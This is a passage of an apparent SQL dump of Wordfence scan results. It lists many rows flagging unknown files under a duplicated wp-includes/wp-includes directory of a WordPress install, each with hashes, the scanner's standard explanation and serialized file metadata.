added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/ID3/module.audio.dts.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26498,1631424847,1631424847,'new','knownfile',75,'ba7d56347a19a7dfff159b4411967b87','656daed317b78e7a7cceb2aeb0150656','Unknown file in WordPress core: wp-includes/wp-includes/ID3/module.audio.flac.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/ID3/module.audio.flac.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26499,1631424847,1631424847,'new','knownfile',75,'68857b06d1227d6f6905f5b89ab59e7f','eb836a884c788e72223bc7f9e00e1f8e','Unknown file in WordPress core: wp-includes/wp-includes/ID3/module.audio.mp3.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/ID3/module.audio.mp3.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26500,1631424847,1631424847,'new','knownfile',75,'876d72aa299395423b7836be0d678ce4','8ef6b35349ce0322b48c878b21b61a36','Unknown file in WordPress core: wp-includes/wp-includes/ID3/module.audio.ogg.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/ID3/module.audio.ogg.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26501,1631424847,1631424847,'new','knownfile',75,'6b1af94515c2f926d4bbe8c4c555017a','807270f5044d532db1fab53e99460860','Unknown file in WordPress core: wp-includes/wp-includes/ID3/module.tag.apetag.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/ID3/module.tag.apetag.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26502,1631424847,1631424847,'new','knownfile',75,'a0a6d50133a279f32c2e98c9797cef33','121e8ff076057ba98697fb18495f0498','Unknown file in WordPress core: wp-includes/wp-includes/ID3/module.tag.id3v1.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/ID3/module.tag.id3v1.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26503,1631424847,1631424847,'new','knownfile',75,'e363a399f9802e0b14b5702b4827c898','5207094f81b83536d1b8c46bc7b6f861','Unknown file in WordPress core: wp-includes/wp-includes/ID3/module.tag.id3v2.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/ID3/module.tag.id3v2.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26504,1631424847,1631424847,'new','knownfile',75,'13ccff56c48898aa2cbd5b982c6c996f','93dc106493662e01c51a5f09b1c719ff','Unknown file in WordPress core: wp-includes/wp-includes/ID3/module.tag.lyrics3.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/ID3/module.tag.lyrics3.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26505,1631424847,1631424847,'new','knownfile',75,'be49cd9777ff9e01e509d7a12ec937c2','727c25b2f6d62596de723b542ccadf36','Unknown file in WordPress core: wp-includes/wp-includes/ID3/readme.txt','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:38:\"wp-includes/wp-includes/ID3/readme.txt\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26506,1631424847,1631424847,'new','knownfile',75,'771404451be40d6a31589da2b9ead69b','203a5b57bd04872cbad6cded05975e47','Unknown file in WordPress core: wp-includes/wp-includes/IXR/class-IXR-base64.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/IXR/class-IXR-base64.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26507,1631424847,1631424847,'new','knownfile',75,'4494b5b8308418e963c3f19d00b4e99f','130e6f2e0682959461817eb5a8774487','Unknown file in WordPress core: wp-includes/wp-includes/IXR/class-IXR-client.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/IXR/class-IXR-client.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26508,1631424847,1631424847,'new','knownfile',75,'8aca3f840ae7ca81df838f11e9e27d60','d47947c5da7f046abf07cddbe206c9ee','Unknown file in WordPress core: wp-includes/wp-includes/IXR/class-IXR-clientmulticall.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/IXR/class-IXR-clientmulticall.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26509,1631424847,1631424847,'new','knownfile',75,'86f829f1770d485e04ee45c563772774','f7e06751f08be7e3cec87cfbb2df03fe','Unknown file in WordPress core: wp-includes/wp-includes/IXR/class-IXR-date.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/IXR/class-IXR-date.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26510,1631424847,1631424847,'new','knownfile',75,'e22a27bbdcb0ea9b01b59c9f9a81454d','56a701d90b3af5584c3586410b30ae18','Unknown file in WordPress core: wp-includes/wp-includes/IXR/class-IXR-error.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/IXR/class-IXR-error.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26511,1631424847,1631424847,'new','knownfile',75,'9a8cab8ec7937dd2dc3c05156c2c2d9c','6ba47616870d0ce6786a17d8af5d35ec','Unknown file in WordPress core: wp-includes/wp-includes/IXR/class-IXR-introspectionserver.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/IXR/class-IXR-introspectionserver.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26512,1631424847,1631424847,'new','knownfile',75,'83cb398448488191dfb27b8e473062dc','411d0ba771fe9366a84727396b886a5a','Unknown file in WordPress core: wp-includes/wp-includes/IXR/class-IXR-message.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/IXR/class-IXR-message.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26513,1631424847,1631424847,'new','knownfile',75,'f6c0938ac448895d15352009b544638e','04f02a5aa068c0b74514b0773b74a5fe','Unknown file in WordPress core: wp-includes/wp-includes/IXR/class-IXR-request.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/IXR/class-IXR-request.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26514,1631424847,1631424847,'new','knownfile',75,'baef6196c98571e8d95f8d8f015e0c76','cff0aa6743a3000714d9a4e39d67fea4','Unknown file in WordPress core: wp-includes/wp-includes/IXR/class-IXR-server.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/IXR/class-IXR-server.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26515,1631424847,1631424847,'new','knownfile',75,'7238129e2041be2ba8918216f7aef223','fc57a58db19bd17d1bc9b2283e38d563','Unknown file in WordPress core: wp-includes/wp-includes/IXR/class-IXR-value.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/IXR/class-IXR-value.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26516,1631424848,1631424848,'new','knownfile',75,'4464d270a010bf2d23d5cfcc974850fa','74291f40d1d082eaeba0def0f033d90a','Unknown file in WordPress core: wp-includes/wp-includes/PHPMailer/Exception.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/PHPMailer/Exception.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26517,1631424848,1631424848,'new','knownfile',75,'7bf4d6a23f9486223fa1c58cba952594','4361b1c56ee2f8a68b28bc8d6d5dd904','Unknown file in WordPress core: wp-includes/wp-includes/PHPMailer/PHPMailer.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/PHPMailer/PHPMailer.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26518,1631424848,1631424848,'new','knownfile',75,'20abcbfcd80ff447b2b349c2f2998dab','70d4331c9cbc584c2d758d4cc931190d','Unknown file in WordPress core: wp-includes/wp-includes/PHPMailer/SMTP.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/PHPMailer/SMTP.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26519,1631424848,1631424848,'new','knownfile',75,'71cfda2a6c8157d391e3af5392a3aba6','8d0b5129e3e26d6c767521287fe6567f','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Auth/Basic.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/Requests/Auth/Basic.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26520,1631424848,1631424848,'new','knownfile',75,'b1052904b07b4b9ec5683ce661852d39','abfbb530738781176a054b537541dc5b','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Auth.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/Requests/Auth.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26521,1631424848,1631424848,'new','knownfile',75,'a7657ad922d401f0aa6e4796babc36e4','2e8f59cc13f5e1f9b763062c35c5f323','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Cookie/Jar.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/Requests/Cookie/Jar.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26522,1631424848,1631424848,'new','knownfile',75,'666e4fea6929870f52f767a3e96a551d','d87eff54d3020cb1757a83dbf5564976','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Cookie.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/Requests/Cookie.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26523,1631424849,1631424849,'new','knownfile',75,'8a980b15ab3b626c47aeef2dac297211','e326880d8063a5ca4658897245e31776','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Exception/HTTP/304.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/Requests/Exception/HTTP/304.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26524,1631424849,1631424849,'new','knownfile',75,'d6b8b621fe8a566b17a842c7f33fd6ac','5a57923588451c95a655250f83912fbf','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Exception/HTTP/305.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/Requests/Exception/HTTP/305.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26525,1631424849,1631424849,'new','knownfile',75,'f7cab5854046f1f353a91a833a821929','055c3c716d50af55153f2668029419db','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Exception/HTTP/306.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/Requests/Exception/HTTP/306.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26526,1631424849,1631424849,'new','knownfile',75,'cbce6cc6d1164a15f41f6f7ccf3414df','d394c831c9b4eebf1fa7af98709a430a','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Exception/HTTP/400.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/Requests/Exception/HTTP/400.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26527,1631424849,1631424849,'new','knownfile',75,'fe6e14e633330a4e81173af9eccc1e12','0a3ef86be58841f4056bdb9e212e2ce7','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Exception/HTTP/401.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/Requests/Exception/HTTP/401.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26528,1631424849,1631424849,'new','knownfile',75,'7c41dacc59c02300fbb58db17df125d3','f089e5ee009be67e92cbfc946bf05624','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Exception/HTTP/402.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/Requests/Exception/HTTP/402.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26529,1631424849,1631424849,'new','knownfile',75,'df44e2554e9580d09247021fad0343c7','5c8576c46059c0c30ec86728d101f90a','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Exception/HTTP/403.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/Requests/Exception/HTTP/403.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26530,1631424849,1631424849,'new','knownfile',75,'9f1af97586ea259c3072d6ddbf9012bf','f1cb9ebbcffeb5203f153b04a8b2c917','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Exception/HTTP/404.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/Requests/Exception/HTTP/404.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26531,1631424849,1631424849,'new','knownfile',75,'1607825cbc63a29489f2c3073deea98f','7ea7a5764f8be886efda45344ffb5715','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Exception/HTTP/405.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/Requests/Exception/HTTP/405.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26532,1631424849,1631424849,'new','knownfile',75,'737345db2015082cd9c6b7d4ca741308','99f12302a0c831b8adc1fbf80601758a','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Exception/HTTP/406.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/Requests/Exception/HTTP/406.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26533,1631424849,1631424849,'new','knownfile',75,'5b2ec4fe8d65100bb0d8fde4958efbe2','35463540ac9c92cec6b4fa6bad9b4b96','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Exception/HTTP/407.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/Requests/Exception/HTTP/407.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26534,1631424850,1631424850,'new','knownfile',75,'d29998fbae04914685bac6c967e05eb7','3014f75c854c27d27d601ffea6e05be3','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Exception/HTTP/408.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/Requests/Exception/HTTP/408.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26535,1631424850,1631424850,'new','knownfile',75,'77122e8cb1ff0d928695f315f8d8e682','665e11627e62391ee74d000ac6142d70','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Exception/HTTP/409.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/Requests/Exception/HTTP/409.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26536,1631424850,1631424850,'new','knownfile',75,'134654f542a9ff037bbf42e12e619219','2120f5127900e0ceab7cfbd77ad757df','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Exception/HTTP/410.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/Requests/Exception/HTTP/410.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26537,1631424850,1631424850,'new','knownfile',75,'ee37d86f3c6ab67acd54ec3a1425cd6d','52e516abb52f2d2e381cc8e1edc3efbd','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Exception/HTTP/411.php','This file is in a WordPress core location but is not distributed with this version of 